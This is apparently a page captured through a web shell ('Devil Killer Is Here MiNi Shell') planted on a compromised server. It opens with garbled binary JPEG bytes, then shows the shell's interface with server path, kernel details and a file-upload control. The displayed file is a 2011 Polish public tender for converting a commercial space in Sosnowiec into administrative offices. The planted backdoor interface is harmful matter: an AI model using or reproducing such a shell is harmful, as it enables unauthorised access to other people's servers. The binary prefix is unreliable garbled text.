JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110110/3560-N-2011.html

<p class="kh_header"><b>Sosnowiec: Zmiana sposobu użytkowania pomieszczenia handlowego na biura administracji ROW-III MZBM -TBS Sp. z o.o. w Sosnowcu 

ZP-01-MZBM-11</b><br>
<b>Numer ogłoszenia: 3560 - 2011; data zamieszczenia: 10.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych TBS Sp. z o.o. w Sosnowcu , ul. Korczaka 7, 41-200 Sosnowiec, woj. śląskie, tel. 032 3642045, faks 032 3642055.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana sposobu użytkowania pomieszczenia handlowego na biura administracji ROW-III MZBM -TBS Sp. z o.o. w Sosnowcu 

ZP-01-MZBM-11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2. Opis przedmiotu zamówienia: 
Zmiana sposobu użytkowania pomieszczenia handlowego na biura administracji ROW- III polegająca 
na wykonaniu /zgodnie z projektem:
- ścianek działowych gipsowo-kartonowych w pomieszczeniach parteru; wiatrołapu z luksferów; 
  w pomieszczeniach piwnic ścianki działowe murowane;
- skucia tynków cementowo-wapiennych i otynkowania ścian piwnic;
- sufitów parteru z płyt gipsowo-kartonowych;
- demontażu i montażu nowych posadzek na izolacji przeciwwodnej w piwnicy;
- wymiany płytek na posadzkach oraz na ścianach w sanitariatach;
- fartuchów z płytek przy umywalkach i zlewozmywakach;
- montażu kratek wentylacyjnych w pomieszczeniach biurowych, wentylatorów wyciągowych 
  w  sanitariatach i pomieszczeniach piwnic;
- montażu zlewów, umywalek, muszli ustępowych w kabinach wraz z instal. wodno-kanaliz.;
- wymiany drzwi wewnętrznych z wymianą nadproży;
- montażu gniazdek, przełączników, przewodów i oświetlenia, itp.
      - wykonaniu wraz z projektem instalacji c.o. i c.w.u. zasilanej gazem ziemnym (piec gazowy 
        2-funkcyjny).

3.2.1. Podstawowy zakres robót obejmuje:
- roboty ogólnobudowlane, bez wymiany stolarki okiennej i drzwi zewnętrznych;
- roboty instalacyjne sanitarne;
- roboty instalacyjne branży gazowej wraz z  c.o. i c.w.u., łącznie z projektem wykonawczym 
i uzgodnieniami;
- roboty instalacyjne w branży elektrycznej.
3.2.2.Przedmiot zamówienia szczegółowo opisany jest w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiarze robót, które stanowią integralną część niniejszej specyfikacji istotnych warunków zamówienia. Zamówienie obejmuje wykonanie wszystkich czynności niezbędnych do prowadzenia prac budowlanych i przekazania przedmiotu zamówienia inwestorowi i użytkownikowi.
Dokumentacja znajduje się na stronie internetowej: http://www.mzbm.sosnowiec.pl
Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych, tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów 
i urządzeń, których pochodzenie zostało określone przez Zamawiającego w części technicznej SIWZ  nazwą producenta.
W przypadku, gdy Wykonawca przewiduje zastosowanie materiałów i urządzeń równoważnych  jest on zobowiązany załączyć w ofercie wykaz materiałów i urządzeń równoważnych (Załącznik Nr 8 
do SIWZ) oraz zgodę projektanta na zastosowanie materiałów i urządzeń równoważnych podanych w w/w wykazie (załącznik Nr 9 do SIWZ).
3.2.3. UWAGA:
Wykonawca powinien po zapoznaniu się z materiałami przetargowymi dokonać wizji lokalnej placu budowy w celu zapoznania się z warunkami wykonania robót i celem sporządzenia projektu organizacji robót wraz z oszacowaniem kosztów zabezpieczeń. Projekt organizacji robót 
i zabezpieczeń stanowi koszt Wykonawcy.
26.4	Do wyliczenia ceny służą: 
- Projekt Budowlany,
- Przedmiar robót budowlanych, instalacji wodnej i kanalizacji,
- Przedmiar robót instalacji elektrycznej, 
- Specyfikacje techniczne - część ogólna i część budowlana, 
- Specyfikacje techniczne instalacji wodno kanalizacyjnej,
- Specyfikacje techniczne instalacji elektrycznej,
Podstawy wyceny podane w przedmiarze robót nie są obligatoryjne, należy je traktować poglądowo. 
26.5	Wszystkie ceny jednostkowe, stawka R-g, Kp, Kz i Zysk określone przez Wykonawcę pozostaną stałe, 
       na okres ważności umowy i nie będą podlegały zmianie przez okres obowiązywania umowy.
26.6	W cenie oferty m.in. należy ująć:
a)	koszty dokumentacji wykonawczej instalacji c.o. i c.w.u. oraz gazowej wraz z uzgodnieniami;
b)	koszty odbiorów gazowni i opinii kominiarskiej;
c)	koszty ubezpieczeń;
d)	koszt organizacji placu budowy i wykonania zaplecza Wykonawcy;
e)	koszt organizacji robót;
f)	koszty uruchomienia kotła cieplnego i instalacji c.o. i c.w.u.;
g)	koszt wszelkich niezbędnych mediów do rozruchów i ruchu próbnego;
h)	koszt mediów do czasu przekazania obiektów do użytkowania
i)	wykonanie prób szczelności istniejącej instalacji, celem sprawdzenia jej stanu technicznego;
j)	wykonanie pełnej dokumentacji zdjęciowej demontażu instalacji i urządzeń oraz robót zanikowych;
Koszty pozycji od c) do j), o których mowa powyżej należy ująć w kosztach ogólnych budowy (stanowiących składniki kosztów pośrednich)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.21.00.00-2, 45.21.10.00-9, 45.30.00.00-0, 45.31.00.00-3, 45.33.30.00-0, 45.40.00.00-1, 45.42.11.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 13.	Wymagania dotyczące wadium.

13.1	Wykonawcy ubiegający się o udzielenie zamówienia zgodnie z art. 45 ust. 2 ustawy są zobowiązani wnieść wadium w wysokości 5.000,00zł (słownie: pięć tysięcy złotych).              

13.2	Termin wniesienia wadium.
		Wadium należy wnieść przed upływem terminu składania ofert.

13.3	Forma wniesienia wadium.
Wadium może być wnoszone zgodnie z art. 45 ust. 6 ustawy w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,  
z  tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.).

13.4	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski o/S-c 82 1050 1360 1000 0008 0000 0572

Skuteczne wniesienie wadium w formie pieniężnej następuje z chwilą wpływu środków pieniężnych na ww. rachunek Zamawiającego.

Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z oryginałem przez Wykonawcę. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 

13.5	W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć  
w sekretariacie MZBM - TBS Sp. z o.o. (ul. Korczaka 7, 41-200 Sosnowiec). Natomiast do oferty należy dołączyć kserokopię złożonego dokumentu, potwierdzoną za zgodność z oryginałem przez Wykonawcę.

13.6	Wykaz elementów, jakie powinny zawierać gwarancje bankowe / ubezpieczeniowe:

1.	zobowiązanie banku/towarzystwa ubezpieczeniowego do zapłaty sumy wadium w przypadku  
        gdy zajdą ku temu ustawowe okoliczności, określone w przepisie art. 46 ust. 4a i ust. 5 ustawy,

2.	dokładną nazwę postępowania stanowiącego przyczynę wystawienia gwarancji,

3.	wskazanie sumy gwarancyjnej,

4.	wskazanie Zamawiającego, czyli beneficjenta gwarancji / ubezpieczonego, tj.: Miejski Zarząd Budynków Mieszkalnych - TBS Sp. z o.o., ul. Korczaka 7, 41-200 Sosnowiec,

5.	wskazanie Wykonawcy, czyli zleceniodawcy gwarancji / ubezpieczyciela,

6.	określenie okresu ważności gwarancji tj. wskazanie terminu, w którym zobowiązanie powstaje oraz wygasa, przy czym gwarancja o charakterze terminowym nie może zostać odwołana.

13.7	Wykaz elementów, jakie powinny zawierać poręczenia bankowe/ poręczenia innej instytucji
(tj. poręczenia spółdzielczej kasy oszczędnościowo - kredytowej/ poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 oraz z 2002 r. z późn. zm.):

1.	zobowiązanie banku / innej instytucji do zapłaty sumy wadium w przypadku gdy zajdą ku temu ustawowe okoliczności, określone w przepisie art. 46 ust 4a i ust. 5 ustawy,

2.	wskazanie podmiotu, za który bank / inna instytucja dokonuje poręczenia,

3.	dokładna nazwa zobowiązania będącego przedmiotem poręczenia,

4.	kwota do wysokości, której bank/ inna instytucja będzie zobowiązany,

5.	określenie okresu ważności poręczenia tj. wskazanie terminu, w którym zobowiązanie powstaje oraz wygasa, przy czym poręczenie o charakterze terminowym nie może zostać odwołane.

13.8	Ważność wadium w formie niepieniężnej winna obejmować okres:

od dnia	17/01/2011	do dnia 	15/02/2011


13.9	Zwrot wadium.

1.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem, iż jeśli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, Zamawiający zatrzymuje wadium wraz z odsetkami chyba, że Wykonawca udowodni, 
że wynika to z przyczyn nie leżących po jego stronie.

	Przy czym Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z pkt 12.9, ppkt 1 SIWZ powyżej, jeśli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium 
w terminie określonym przez Zamawiającego.  

2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

3.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 

4.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
z
a przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

13.10	Utrata wadium.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;

2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;

3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

13.11	Wykonawcy, którzy nie wniosą wadium do upływu terminu składania ofert, w tym również na przedłużony okres związania ofertą lub nie zgodzą się na przedłużenie okresu związania ofertą oraz nie wniosą wadium w terminie określonym przez Zamawiającego w przypadku Wykonawcy, któremu zwrócono wadium zgodnie z pkt 13.9, ppkt 2 SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza, zostaną wykluczeni z postępowania (art. 24 ust. 2 pkt 2 ustawy).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia i dokumenty, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.

11.	1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy. Upoważnienie do podpisywania ofert i występowania 
w przetargu w imieniu wykonawcy musi być dołączone do oferty lub musi bezpośrednio wynikać 
z przedstawionych dokumentów. Gdy wykonawcę reprezentuje pełnomocnik do oferty musi być dołączone pełnomocnictwo posiadające szczegółowy zakres i podpisane przez osoby reprezentujące osobę prawną lub fizyczną /w formie oryginału bądź kserokopii poświadczonej notarialnie/.
11.2	 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wskazana data podpisania wykazu. Wymagane załączenie podpisanych kserokopii uprawnień budowlanych 
do kierowania robotami w branżach: konstrukcyjno-budowlanej; instalacyjnej w zakresie instalacji 
i urządzeń centralnego ogrzewania, wodociągowych i kanalizacyjnych, gazowych oraz instalacyjnej w zakresie instalacji i urządzeń elektrycznych, (1 osoba z każdej branży) z potwierdzeniem przynależności do Branżowej Izby Inżynierów Budownictwa, ewentualnie właściwej dla danej specjalności Izby Samorządu Zawodowego. Zamawiający dopuszcza posiadanie 2 lub więcej uprawnień przez 1 osobę. - (ZAŁĄCZNIK NR 5). 
11.3	 Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy należy przedstawić wykaz robót wykonanych w tym czasie), potwierdzający spełnianie warunku określonego w pkt. 10.2.4 SIWZ - wskazana data podpisania wykazu.
Uwaga: jeżeli zakres wykazanych i udokumentowanych robót budowlanych jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie robót wskazać wartość prac odpowiadających zakresowi wskazanemu w pkt 10.2.4 SIWZ (ZAŁĄCZNIK NR 4).
11.4	 Dokumenty potwierdzające, że roboty budowlane, o których mowa w punkcie 11.3 zostały wykonane należycie (np. referencje).
11.5	 Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia w kwocie nie mniejszej niż 100.000 zł.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>11.2	 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wskazana data podpisania wykazu. Wymagane załączenie podpisanych kserokopii uprawnień budowlanych 
do kierowania robotami w branżach: konstrukcyjno-budowlanej; instalacyjnej w zakresie instalacji i urządzeń centralnego ogrzewania, wodociągowych i kanalizacyjnych, gazowych oraz instalacyjnej w zakresie instalacji i urządzeń elektrycznych, (1 osoba z każdej branży) z potwierdzeniem przynależności do Branżowej Izby Inżynierów Budownictwa, ewentualnie właściwej dla danej specjalności Izby Samorządu Zawodowego. Zamawiający dopuszcza posiadanie 2 lub więcej uprawnień przez 1 osobę. - (ZAŁĄCZNIK NR 5). 
11.3	 Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy należy przedstawić wykaz robót wykonanych w tym czasie), potwierdzający spełnianie warunku określonego w pkt. 10.2.4 SIWZ - wskazana data podpisania wykazu.
Uwaga: jeżeli zakres wykazanych i udokumentowanych robót budowlanych jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie robót wskazać wartość prac odpowiadających zakresowi wskazanemu w pkt 10.2.4 SIWZ (ZAŁĄCZNIK NR 4).
11.4	 Dokumenty potwierdzające, że roboty budowlane, o których mowa w punkcie 11.3 zostały wykonane należycie (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zgodnie z art. 26 ust. 2b ustawy może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

11.13	 Jeżeli natomiast Wykonawca wykazując spełnianie warunków, o których mowa 
w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych 
w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca przedkłada także dokumenty dotyczące tych podmiotów w zakresie wymaganym dla Wykonawcy, określonym w pkt 11.12 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>11.2	 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wskazana data podpisania wykazu. Wymagane załączenie podpisanych kserokopii uprawnień budowlanych 
do kierowania robotami w branżach: konstrukcyjno-budowlanej; instalacyjnej w zakresie instalacji 
i urządzeń centralnego ogrzewania, wodociągowych i kanalizacyjnych, gazowych oraz instalacyjnej w zakresie instalacji i urządzeń elektrycznych, (1 osoba z każdej branży) z potwierdzeniem przynależności do Branżowej Izby Inżynierów Budownictwa, ewentualnie właściwej dla danej specjalności Izby Samorządu Zawodowego. Zamawiający dopuszcza posiadanie 2 lub więcej uprawnień przez 1 osobę. - (ZAŁĄCZNIK NR 5).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE WYKONAWCY

Stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt 1 - 4 Ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz. U. z 2010r. nr 113 poz.759) oświadczam, że:

1	posiadam uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;

2	posiadam wiedzę i doświadczenie niezbędne do wykonania zamówienia;

3	dysponuję odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;

4	znajduję się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
